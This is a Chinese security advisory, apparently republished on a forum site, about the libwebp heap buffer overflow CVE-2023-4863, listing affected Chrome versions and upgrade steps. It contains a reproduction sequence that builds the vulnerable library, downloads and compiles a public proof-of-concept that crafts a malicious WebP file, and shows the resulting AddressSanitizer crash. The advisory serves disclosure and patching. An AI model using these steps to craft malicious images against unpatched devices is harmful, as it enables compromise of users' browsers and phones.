RM新时代网站-首页

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

WebP圖像編解碼庫libwebp存在堆緩沖區(qū)溢出漏洞

哆啦安全 ? 來源:哆啦安全 ? 2023-09-25 09:48 ? 次閱讀

一、漏洞概述

WebP圖像編解碼庫libwebp存在堆緩沖區(qū)溢出漏洞(CVE-2023-4863),攻擊者可以通過發(fā)送植入惡意代碼的WebP圖像獲得設(shè)備的部分權(quán)限。

WebP是由Google開發(fā)的一種圖像格式,可為網(wǎng)絡(luò)圖像提供有損和無損壓縮。它旨在減小圖像的文件大小,同時不損失其視覺質(zhì)量。Google Chrome是由Google開發(fā)的一款支持WebP圖像格式的網(wǎng)頁瀏覽器。

由于libwebp的使用范圍廣泛,不僅應(yīng)用于各大瀏覽器,還包含在系統(tǒng)的底層庫中 (例如:Android),以及目前滿大街都是的Electron中無一例外均使用了libwebp 庫。請各位盡快更新瀏覽器及使用Electron技術(shù)的相關(guān)應(yīng)用。

但CVE-2023-4863并未包含在Google即將在下月發(fā)布的10月安全更新之中 (一般 Google會提前半個月至一個月向合作廠商發(fā)布下月安全補丁,以便廠商能夠迅速修復(fù)漏洞),考慮到該漏洞已經(jīng)可能有野外利用的例子,Android設(shè)備目前相對而言還是比較危險的,不知Google后續(xù)是否有額外更新計劃來緊急修復(fù)該漏洞。否則按現(xiàn)有更新計劃,可能就要等到11月安全補丁才會修復(fù)了。

也希望Google能夠像之前爆出藍牙漏洞時那樣,為已經(jīng)停止支持的舊設(shè)備 (如 Pixel 4a) 提供計劃外安全更新。 補充:根據(jù)Mishaal Rahman老師的消息,Google有可能推出2023-10-06安全補丁等級來專門修復(fù)該漏洞,但若廠商無意更新,則還要遲至11月安全補丁才會修復(fù)。

  # checkout webp
$ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
$ cd webp_test/
  # checkout vulnerable version
$ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
  # enable AddressSanitizer
$ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
  # build webp
$ make -f makefile.unix
$ cd examples/
  # fetch mistymntncop's proof-of-concept code
$ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
  # build and run proof-of-concept
$ gcc -o craft craft.c
$ ./craft bad.webp
  # test trigger file
$ ./dwebp bad.webp -o test.png
=================================================================
==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80
WRITE of size 1 at 0x626000002f28 thread T0
#0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359)
#1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7)
#2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff)
#3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5)
#4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216)
#5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b)
#6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06)
#7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026)
#8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308
#9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d)
0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28)
allocated by thread T0 here:
#0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable
...


二、影響范圍

Google Chrome(Windows)版本 < 116.0.5845.187/.188

Google Chrome(Mac/Linux)版本 < 116.0.5845.187

三、安全措施3.1升級版本

目前該漏洞已經(jīng)修復(fù),受影響用戶可升級到以下版本:

Google Chrome(Windows)版本 >=116.0.5845.187/.188

Google Chrome(Mac/Linux)版本 >=116.0.5845.187

四、下載地址

五、手動檢查更新
可在Chrome 菜單-【幫助】-【關(guān)于 Google Chrome】檢查版本更新,并在更新完成后重新啟動。 8ec71ef2-5b2f-11ee-939d-92fbcf53809c.png ? 8eda626e-5b2f-11ee-939d-92fbcf53809c.png ? 升級后的版本號:Version 117.0.5938.92 (Official Build) (64-bit)

8eebbb68-5b2f-11ee-939d-92fbcf53809c.png

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • Android
    +關(guān)注

    關(guān)注

    12

    文章

    3935

    瀏覽量

    127337
  • Google
    +關(guān)注

    關(guān)注

    5

    文章

    1762

    瀏覽量

    57504
  • 代碼
    +關(guān)注

    關(guān)注

    30

    文章

    4779

    瀏覽量

    68521

原文標(biāo)題:WebP圖像編解碼庫libwebp存在堆緩沖區(qū)溢出漏洞(升級Google Chrome瀏覽器為最新版本)

文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    CC++源程序緩沖區(qū)溢出漏洞的靜態(tài)檢測

    CC++源程序緩沖區(qū)溢出漏洞的靜態(tài)檢測.
    發(fā)表于 08-16 00:43

    緩沖區(qū)溢出的危害及避免緩沖區(qū)溢出的三種方法

    1. 蠕蟲病毒簡介2. 緩沖區(qū)溢出3. 緩沖區(qū)溢出舉例4. 緩沖區(qū)溢出的危害5. 內(nèi)
    發(fā)表于 03-02 07:55

    緩沖區(qū)溢出的危害及避免緩沖區(qū)溢出的三種方法

    1. 蠕蟲病毒簡介2. 緩沖區(qū)溢出3. 緩沖區(qū)溢出舉例4. 緩沖區(qū)溢出的危害5. 內(nèi)
    發(fā)表于 03-30 14:01

    緩沖區(qū)溢出攻擊模式及其防御的研究

    借助統(tǒng)一建模語言,概括近十年來利用緩沖區(qū)溢出進行攻擊的攻擊模式,從預(yù)防、發(fā)現(xiàn)、抵御緩沖區(qū)溢出攻擊以及攻擊后的程序恢復(fù)等方面對目前有代表性的防御、檢測方法和攻
    發(fā)表于 12-18 16:42 ?7次下載

    基于中間匯編的緩沖區(qū)溢出檢測模型

    提出一種基于中間匯編的緩沖區(qū)溢出檢測模型,用于對可執(zhí)行代碼進行靜態(tài)分析和檢測。采用中間匯編形式可以使算法對硬件平臺透明,增強代碼可閱讀性,有利于對緩沖區(qū)溢出
    發(fā)表于 03-29 11:10 ?20次下載

    基于狀態(tài)圖的緩沖區(qū)溢出攻擊分析

    結(jié)合緩沖區(qū)溢出攻擊產(chǎn)生的原理,分析緩沖區(qū)溢出攻擊代碼的結(jié)構(gòu),論述Snort規(guī)則對緩沖區(qū)溢出攻擊的
    發(fā)表于 04-10 08:46 ?32次下載

    二進制環(huán)境下的緩沖區(qū)溢出漏洞動態(tài)檢測

    提出一種在二進制環(huán)境下挖掘緩沖區(qū)溢出漏洞的方法。結(jié)合動態(tài)與靜態(tài)挖掘技術(shù)對二進制環(huán)境下的程序作進一步的漏洞查找。靜態(tài)方法主要對二進制程序中函數(shù)棧幀的特征和匯編語
    發(fā)表于 04-10 09:54 ?27次下載

    基于可執(zhí)行代碼的緩沖區(qū)溢出檢測模型

    根據(jù)緩沖區(qū)溢出原理,提出一種基于可執(zhí)行代碼的緩沖區(qū)溢出檢測模型,給出該模型的理論基礎(chǔ),描述模型構(gòu)建的過程,提出新的緩沖區(qū)引用實例的識別方法。
    發(fā)表于 04-20 09:26 ?31次下載

    二進制掃描的緩沖區(qū)溢出漏洞探測技術(shù)

    緩沖區(qū)溢出漏洞自從出現(xiàn)以來,一直引起許多嚴重的安全性問題,而且隨著軟件系統(tǒng)越做越大,越來越復(fù)雜,緩沖區(qū)溢出
    發(fā)表于 08-10 10:19 ?17次下載

    Windows緩沖區(qū)溢出攻擊的實例研究

    本文首先詳細分析了Windows 緩沖區(qū)溢出的基本原理和具體流程。在此基礎(chǔ)上,通過對一個Windows 網(wǎng)絡(luò)緩沖區(qū)溢出攻擊實例的詳細調(diào)試分析,研究了Windows
    發(fā)表于 08-28 09:44 ?17次下載

    緩沖區(qū)溢出攻擊的防護技術(shù)分析

    緩沖區(qū)溢出攻擊已經(jīng)成為網(wǎng)絡(luò)攻擊的主要方式。本文首先分析了緩沖區(qū)溢出攻擊的基本原理,然后分析了形成緩沖區(qū)
    發(fā)表于 09-02 10:50 ?9次下載

    緩沖區(qū)溢出攻擊的原理和防范技術(shù)分析

    基于解決緩沖區(qū)溢出這一普遍發(fā)生的網(wǎng)絡(luò)安全漏洞的目的,通過軟件、硬件技術(shù)層面的驗證方法,結(jié)合人工檢查、靜態(tài)發(fā)現(xiàn)技術(shù)、動態(tài)防御技術(shù)等實驗手段,得出了在向緩沖區(qū)中傳輸數(shù)
    發(fā)表于 05-27 16:20 ?17次下載

    為什么緩沖區(qū)溢出會帶來危害?會帶來哪些危害?

    在當(dāng)前網(wǎng)絡(luò)與分布式系統(tǒng)安全中,被廣泛利用的50%以上都是緩沖區(qū)溢出,其中最著名的例子是1988年利用fingerd漏洞的蠕蟲。而緩沖區(qū)溢出
    發(fā)表于 11-28 14:46 ?1.2w次閱讀
    為什么<b class='flag-5'>緩沖區(qū)</b><b class='flag-5'>溢出</b>會帶來危害?會帶來哪些危害?

    消除IoT上的緩沖區(qū)溢出漏洞

    黑客可以使用堆棧緩沖區(qū)溢出將可執(zhí)行文件替換為惡意代碼,從而允許他們利用內(nèi)存或調(diào)用堆棧本身等系統(tǒng)資源。例如,控制流劫持利用堆棧緩沖區(qū)溢出將代
    的頭像 發(fā)表于 10-12 15:25 ?919次閱讀
    消除IoT上的<b class='flag-5'>緩沖區(qū)</b><b class='flag-5'>溢出</b><b class='flag-5'>漏洞</b>

    消除物聯(lián)網(wǎng)上的緩沖區(qū)溢出漏洞

      黑客可以使用堆棧緩沖區(qū)溢出將可執(zhí)行文件替換為惡意代碼,從而使他們能夠利用內(nèi)存或調(diào)用堆棧本身等系統(tǒng)資源。例如,控制流劫持利用堆棧緩沖區(qū)溢出
    的頭像 發(fā)表于 12-02 11:57 ?1013次閱讀
    RM新时代网站-首页